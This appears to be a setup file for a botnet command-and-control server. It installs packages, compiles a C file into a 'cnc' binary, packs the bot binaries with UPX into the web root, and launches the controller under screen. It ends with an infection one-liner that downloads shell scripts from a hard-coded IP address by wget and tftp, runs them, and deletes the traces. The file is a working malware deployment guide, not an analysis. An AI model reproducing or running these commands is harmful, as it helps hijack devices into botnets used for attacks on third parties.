yum install epel-release

yum install deltarpm

yum install httpd
yum install iptables

# Python 2 install
wget https://www.python.org/ftp/python/2.7.18/Python-2.7.18.tgz
tar xzf Python-2.7.18.tgz
cd Python-2.7.18
./configure --enable-optimizations
make install

curl -O https://bootstrap.pypa.io/pip/2.7/get-pip.py
python2 get-pip.py 

pip2 install paramiko

yum install python-paramiko nano screen gcc perl wget libzip unzip -y

gcc c7.c -w -o cnc -pthread

python compile.py

chmod 777 *

./upx --ultra-brute /var/www/html/*

screen ./cnc 4258 1 55555
            
NOW PRESS CRTL A+D

LOGIN WITH PUTTY RAW PORT = SCREENPORT





cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://192.210.186.195/cashmoneybot.sh; chmod 777 cashmoneybot.sh; sh cashmoneybot.sh; tftp 192.210.186.195 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 192.210.186.195; chmod 777 tftp2.sh; sh tftp2.sh; rm -rf *
